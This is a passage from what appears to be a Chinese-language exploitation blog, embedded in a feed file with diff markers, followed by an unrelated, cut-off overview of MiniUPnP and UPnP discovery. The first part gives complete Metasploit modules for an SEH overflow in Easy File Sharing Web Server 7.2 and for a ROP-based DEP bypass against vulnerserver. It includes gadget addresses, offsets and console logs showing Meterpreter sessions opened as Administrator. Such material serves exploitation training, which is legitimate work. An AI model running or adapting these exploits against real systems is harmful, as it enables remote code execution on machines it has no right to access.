-r</span><br></pre></td></tr></table></figure></p><ol start="2"><li>构造SEH链</li></ol><ul><li>将Easy File Sharing Web Server 7.2加载到ImmunityDebugger中，并处于运行状态。</li><li>发送溢出字符序列</li><li>查看Easy File Sharing Web Server 7.2溢出地址<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/231.png" alt></li></ul><ol start="3"><li>计算偏移量<br>计算catch块偏移量&amp;计算下一条SEH记录偏移量</li></ol><h2 id="寻找PPR"><a href="#寻找PPR" class="headerlink" title="寻找PPR"></a>寻找PPR</h2><ol><li>使用mona寻找<br>需要POP/POP/RET指令的地址来载入下一条SEH记录的地址，并跳转到攻击载荷<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">!mona modules</span><br><span class="line">!mona seh</span><br></pre></td></tr></table></figure></li></ol><h2 id="自动化攻击-1"><a href="#自动化攻击-1" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><ol><li><p>编写攻击脚本</p><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MetasploitModule</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line">  Rank = NormalRanking</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Seh</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line">    <span class="keyword">super</span>(update_info(info,</span><br><span class="line">      <span class="string">'Name'</span>            =&gt; <span class="string">'Easy File Sharing HTTP Server 7.2 SEH Overflow'</span>,</span><br><span class="line">      <span class="string">'Description'</span>     =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">        This Module Demonstrate SEH based overflow example</span></span><br><span class="line"><span class="string">      &#125;</span>,</span><br><span class="line">      <span class="string">'Author'</span>          =&gt; <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line">      <span class="string">'Payload'</span>         =&gt;</span><br><span class="line">        &#123;</span><br><span class="line">          <span class="string">'Space'</span>       =&gt; <span class="number">390</span>,</span><br><span class="line">          <span class="string">'BadChars'</span>    =&gt; <span class="string">"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"</span></span><br><span class="line">        &#125;,</span><br><span class="line">      <span class="string">'Platform'</span>      =&gt; <span class="string">'Windows'</span>,</span><br><span class="line">      <span class="string">'Targets'</span>       =&gt;</span><br><span class="line">          [</span><br><span class="line">               [</span><br><span class="line">                 <span class="string">'Easy File Sharing 7.2 HTTP'</span>,</span><br><span class="line">              &#123;</span><br><span class="line">                <span class="string">'Ret'</span>       =&gt; <span class="number">0x10022fd7</span>,</span><br><span class="line">                <span class="string">'Offset'</span>    =&gt; <span class="number">4061</span></span><br><span class="line">              &#125;</span><br><span class="line">               ]</span><br><span class="line">           ],</span><br><span class="line">      <span class="string">'DisclosureDate'</span>  =&gt; <span class="string">'2019-01-16'</span>,</span><br><span class="line">  ))</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line">    connect</span><br><span class="line">    weapon = <span class="string">"HEAD "</span></span><br><span class="line">    weapon &lt;&lt; make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line">    weapon &lt;&lt; generate_seh_record(target[<span class="string">'Ret'</span>])</span><br><span class="line">    weapon &lt;&lt; make_nops(<span class="number">20</span>)</span><br><span class="line">    weapon &lt;&lt; payload.encoded</span><br><span class="line">    weapon &lt;&lt; <span class="string">" HTTP/1.0\r\n\r\n"</span></span><br><span class="line">    sock.put(weapon)</span><br><span class="line">    handler</span><br><span class="line">    disconnect</span><br><span class="line">   <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure></li><li><p>exploit</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/seh_attack</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; set rhosts 192.168.31.114</span><br><span class="line">rhosts =&gt; 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; set rport 80</span><br><span class="line">rport =&gt; 80</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; set payload windows/meterpreter/bind_tcp</span><br><span class="line">payload =&gt; windows/meterpreter/bind_tcp</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:46601 -&gt; 192.168.31.114:4444) at 2019-07-10 16:43:47 +0800</span><br><span class="line"></span><br><span class="line">meterpreter &gt; getuid</span><br><span class="line">Server username: WHU-3E3EECEBFD1\Administrator</span><br></pre></td></tr></table></figure></li></ol><hr><h1 id="0x03-绕过DEP"><a href="#0x03-绕过DEP" class="headerlink" title="0x03 绕过DEP"></a>0x03 绕过DEP</h1><blockquote><p><strong>目标程序</strong> <a href="http://www.thegreycorner.com/2010/12/introducing-vulnserver.html" target="_blank" rel="noopener">Introducing Vulnserver</a><br><strong>使用</strong> vulnserver.exe 6666<br><strong>漏洞点</strong> <img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png" alt></p></blockquote><h2 id="设置DEP保护"><a href="#设置DEP保护" class="headerlink" title="设置DEP保护"></a>设置DEP保护</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/%E6%8D%9511%E8%8E%B7.png" alt><br><em>构建ROP链来调用VirtualProtect()关闭DEP并执行Shellcode</em></p><h2 id="计算偏移量"><a href="#计算偏移量" class="headerlink" title="计算偏移量"></a>计算偏移量</h2><p><code>&#39;TRUN .&#39;+make_nops(target[&#39;Offset&#39;])</code><br>Immunity附加进程之后，在服务端发送3000个字符，计算偏移</p><h2 id="创建ROP链"><a href="#创建ROP链" class="headerlink" title="创建ROP链"></a>创建ROP链</h2><p><code>!mona rop -m *.dll -cp nonull</code><br><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">################################################################################</span></span><br><span class="line"></span><br><span class="line">Register setup <span class="keyword">for</span> VirtualProtect() <span class="symbol">:</span></span><br><span class="line">--------------------------------------------</span><br><span class="line"> EAX = NOP (<span class="number">0x90909090</span>)</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = ReturnTo (ptr to jmp esp)</span><br><span class="line"> ESI = ptr to VirtualProtect()</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> --- alternative chain ---</span><br><span class="line"> EAX = ptr to &amp;VirtualProtect()</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = POP (skip <span class="number">4</span> bytes)</span><br><span class="line"> ESI = ptr to JMP [EAX]</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> + place ptr to <span class="string">"jmp esp"</span> on stack, below PUSHAD</span><br><span class="line">--------------------------------------------</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ROP Chain <span class="keyword">for</span> VirtualProtect() [(XP/<span class="number">2003</span> Server <span class="keyword">and</span> up)] <span class="symbol">:</span></span><br><span class="line">----------------------------------------------------------</span><br><span class="line"></span><br><span class="line">*** [ Ruby ] ***</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line">    rop_gadgets =</span><br><span class="line">    [</span><br><span class="line">      <span class="number">0x77dabf34</span>,  <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x6250609c</span>,  <span class="comment"># ptr to &amp;VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77d1927f</span>,  <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x7c96d192</span>,  <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x77bef671</span>,  <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x625011af</span>,  <span class="comment"># &amp; jmp esp [essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77e9ad22</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0xfffffdff</span>,  <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line">      <span class="number">0x77e6c784</span>,  <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77dc560a</span>,  <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x7c87fbcb</span>,  <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line">      <span class="number">0xffffffc0</span>,  <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line">      <span class="number">0x77d4493b</span>,  <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x77c28fbc</span>,  <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x77bef7c9</span>,  <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x7c99bac1</span>,  <span class="comment"># &amp;Writable location [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x719e4870</span>,  <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line">      <span class="number">0x77e6d224</span>,  <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77e8c50c</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x90909090</span>,  <span class="comment"># nop</span></span><br><span class="line">      <span class="number">0x77de60c7</span>,  <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line">    ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> rop_gadgets</span><br><span class="line"></span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  <span class="comment"># Call the ROP chain generator inside the 'exploit' function :</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  rop_chain = create_rop_chain()</span><br></pre></td></tr></table></figure></p><h2 id="自动化攻击-2"><a href="#自动化攻击-2" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line">  Rank = NormalRanking</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line">    <span class="keyword">super</span>(update_info(info,</span><br><span class="line">      <span class="string">'Name'</span>           =&gt; <span class="string">'DEP Bypass Exploit'</span>,</span><br><span class="line">      <span class="string">'Description'</span>    =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">          DEP Bypass Using ROP Chains Example Module</span></span><br><span class="line"><span class="string">        &#125;</span>,</span><br><span class="line">      <span class="string">'Platform'</span>       =&gt; <span class="string">'Windows'</span>,</span><br><span class="line">      <span class="string">'Author'</span>         =&gt; <span class="string">'yanhan'</span>,</span><br><span class="line">      <span class="string">'Payload'</span>        =&gt;</span><br><span class="line">          &#123;</span><br><span class="line">            <span class="string">'space'</span>     =&gt; <span class="number">312</span>,</span><br><span class="line">            <span class="string">'BadChars'</span>  =&gt; <span class="string">"\x00"</span></span><br><span class="line">          &#125;,</span><br><span class="line">      <span class="string">'Targets'</span>        =&gt;</span><br><span class="line">          [</span><br><span class="line">              [</span><br><span class="line">    <span class="string">'Windows XP'</span>,</span><br><span class="line">    &#123;<span class="string">'Offset'</span>  =&gt; find it&#125;</span><br><span class="line">    ]</span><br><span class="line">          ],</span><br><span class="line">      <span class="string">'DisclosureDate'</span> =&gt; <span class="string">'2019-01-16'</span>))</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line">    rop_gadgets =</span><br><span class="line">    [</span><br><span class="line">      <span class="number">0x77dabf34</span>,  <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x6250609c</span>,  <span class="comment"># ptr to &amp;VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77d1927f</span>,  <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x7c96d192</span>,  <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x77bef671</span>,  <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x625011af</span>,  <span class="comment"># &amp; jmp esp [essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77e9ad22</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0xfffffdff</span>,  <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line">      <span class="number">0x77e6c784</span>,  <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77dc560a</span>,  <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x7c87fbcb</span>,  <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line">      <span class="number">0xffffffc0</span>,  <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line">      <span class="number">0x77d4493b</span>,  <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x77c28fbc</span>,  <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x77bef7c9</span>,  <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x7c99bac1</span>,  <span class="comment"># &amp;Writable location [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x719e4870</span>,  <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line">      <span class="number">0x77e6d224</span>,  <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77e8c50c</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x90909090</span>,  <span class="comment"># nop</span></span><br><span class="line">      <span class="number">0x77de60c7</span>,  <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line">    ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> rop_gadgets</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line">    connect</span><br><span class="line">    rop_chain = create_rop_chain()</span><br><span class="line">    junk = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line">    buf = <span class="string">"TRUN ."</span> + junk + rop_chain + make_nops(<span class="number">16</span>) + payload.encoded + <span class="string">'\r\n'</span></span><br><span class="line">    sock.put(buf)</span><br><span class="line">    handler</span><br><span class="line">    disconnect</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/rop_attack</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; set rhosts 192.168.31.114</span><br><span class="line">rhosts =&gt; 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; set rport 1000</span><br><span class="line">rport =&gt; 1000</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; set payload windows/meterpreter/bind_tcp</span><br><span class="line">payload =&gt; windows/meterpreter/bind_tcp</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:44537 -&gt; 192.168.31.114:4444) at 2019-07-10 16:51:07 +0800</span><br><span class="line"></span><br><span class="line">meterpreter &gt; getuid</span><br><span class="line">Server username: WHU-3E3EECEBFD1\Administrator</span><br></pre></td></tr></table></figure>]]></content>
       
       
       <categories>
@@ -131,7 +131,7 @@
       <link href="/2019/04/21/XIAOMI-UPnP/"/>
       <url>/2019/04/21/XIAOMI-UPnP/</url>
       
-        <content type="html"><![CDATA[<h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p><a href="http://miniupnp.free.fr/" target="_blank" rel="noopener">HomePage</a><br><a href="https://openwrt.org/docs/guide-user/firewall/upnp/miniupnpd" target="_blank" rel="noopener">OpenWRT与miniUPnP</a></p><blockquote><p>MiniUPnP项目提供了支持UPnP IGD(互联网网关设备)规范的软件。<br>在MiniUPnPd中添加了NAT-PMP和PCP支持。 对于客户端（MiniUPnPc）使用libnatpmp来支持NAT-PMP。<br>MiniUPnP守护程序（MiniUPnPd）支持OpenBSD，FreeBSD，NetBSD，DragonFly BSD（Open）Solaris和Mac OS X以及pf或ipfw（ipfirewall）或ipf和Linux with netfilter。 MiniUPnP客户端（MiniUPnPc）和MiniSSDPd是便携式的，可以在任何POSIX系统上运行。 MiniUPnPc也适用于MS Windows和AmigaOS（版本3和4）。</p></blockquote><h2 id="UPnP-IGD客户端轻量级库和UPnP-IGD守护进程"><a href="#UPnP-IGD客户端轻量级库和UPnP-IGD守护进程" class="headerlink" title="UPnP IGD客户端轻量级库和UPnP IGD守护进程"></a>UPnP IGD客户端轻量级库和UPnP IGD守护进程</h2><p>大多数家庭adsl /有线路由器和Microsoft Windows 2K/XP都支持UPnP协议。 MiniUPnP项目的目标是提供一个免费的软件解决方案来支持协议的“Internet网关设备”部分。</p><blockquote><p>用于UPnP设备的Linux SDK（libupnp）对我来说似乎太沉重了。 我想要最简单的库，占用空间最小，并且不依赖于其他库，例如XML解析器或HTTP实现。 所有代码都是纯ANSI C.</p></blockquote><p>miniupnp客户端库在x86 PC上编译，代码大小不到50KB。<br>miniUPnP守护程序比任何其他IGD守护程序小得多，因此非常适合在低内存设备上使用。 它也只使用一个进程而没有其他线程，不使用任何system（）或exec（）调用，因此保持系统资源使用率非常低。<br>该项目分为两个主要部分：</p><ul><li>MiniUPnPc，客户端库，使应用程序能够访问网络上存在的UPnP“Internet网关设备”提供的服务。 在UPnP术语中，MiniUPnPc是UPnP控制点。</li><li>MiniUPnPd，一个守护进程，通过作为网关的linux或BSD（甚至Solaris）为您的网络提供这些服务。 遵循UPnP术语，MiniUPnPd是UPnP设备。<br>开发MiniSSDPd与MiniUPnPc，MiniUPnPd和其他协作软件一起工作：1. MiniSSDPd监听网络上的SSDP流量，因此MiniUPnPc或其他UPnP控制点不需要执行发现过程，并且可以更快地设置重定向；   2.  MiniSSDPd还能够代表MiniUPnPd或其他UPnP服务器软件回复M-SEARCH SSDP请求。 这对于在同一台机器上托管多个UPnP服务很有用。<br>守护进程现在也可以使用netfilter用于linux 2.4.x和2.6.x. 可以使它在运行OpenWRT的路由器设备上运行。<br>由于某些原因，直接使用MiniUPnP项目中的代码可能不是一个好的解决方案。<br>由于代码很小且易于理解，因此为您自己的UPnP实现提供灵感是一个很好的基础。 C ++中的<a href="http://ktorrent.org/" target="_blank" rel="noopener">KTorrent</a> UPnP插件就是一个很好的例子。</li></ul><h2 id="MiniUPnP客户端库的实用性"><a href="#MiniUPnP客户端库的实用性" class="headerlink" title="MiniUPnP客户端库的实用性"></a>MiniUPnP客户端库的实用性</h2><p>只要应用程序需要侦听传入的连接，MiniUPnP客户端库的使用就很有用。例如：P2P应用程序，活动模式的FTP客户端，IRC（用于DCC）或IM应用程序，网络游戏，任何服务器软件。</p><ul><li>路由器的UPnP IGD功能的典型用法是使用MSN Messenger的文件传输。 MSN Messenger软件使用Windows XP的UPnP API打开传入连接的端口。 为了模仿MS软件，最好也使用UPnP。</li><li>已经为XChat做了一个补丁，以展示应用程序如何使用miniupnp客户端库。</li><li>传输，一个免费的软件BitTorrent客户端正在使用miniupnpc和libnatpmp。</li></ul><h2 id="MiniUPnP守护进程的实用性"><a href="#MiniUPnP守护进程的实用性" class="headerlink" title="MiniUPnP守护进程的实用性"></a>MiniUPnP守护进程的实用性</h2><p>UPnP和NAT-PMP用于改善NAT路由器后面的设备的互联网连接。 诸如游戏，IM等的任何对等网络应用可受益于支持UPnP和/或NAT-PMP的NAT路由器。最新一代的Microsoft XBOX 360和Sony Playstation 3游戏机使用UPnP命令来启用XBOX Live服务和Playstation Network的在线游戏。 据报道，MiniUPnPd正在与两个控制台正常工作。 它可能需要一个精细的配置调整。</p><h2 id="安全"><a href="#安全" class="headerlink" title="安全"></a>安全</h2><p>UPnP实施可能会受到安全漏洞的影响。 错误执行或配置的UPnP IGD易受攻击。 安全研究员HD Moore做了很好的工作来揭示现有实施中的漏洞：<a href="http://hdm.io/writing/originals/SecurityFlawsUPnP.pdf" target="_blank" rel="noopener">通用即插即用（PDF）中的安全漏洞</a>。 一个常见的问题是让SSDP或HTTP/SOAP端口对互联网开放：它们应该只能从LAN访问。</p><h1 id="协议栈"><a href="#协议栈" class="headerlink" title="协议栈"></a>协议栈</h1><p>工作流程<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830377/paper/111.png" alt></p><p>Linux体系结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830425/paper/112.png" alt></p><h2 id="发现"><a href="#发现" class="headerlink" title="发现"></a>发现</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830465/paper/113.png" alt><br>给定一个IP地址（通过DHCP获得），UPnP网络中的第一步是发现。<br>当一个设备被加入到网络中并想知道网络上可用的UPnP服务时，UPnP检测协议允许该设备向控制点广播自己的服务。通过UDP协议向端口1900上的多播地址239.255.255.250发送发现消息。此消息包含标头，类似于HTTP请求。此协议有时称为HTTPU（HTTP over UDP）：<br><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">M-SEARCH * HTTP / <span class="number">1.1</span></span><br><span class="line">主机：<span class="number">239.255</span><span class="number">.255</span><span class="number">.250</span> ：<span class="number">1900</span></span><br><span class="line">MAN：ssdp：discover</span><br><span class="line">MX：<span 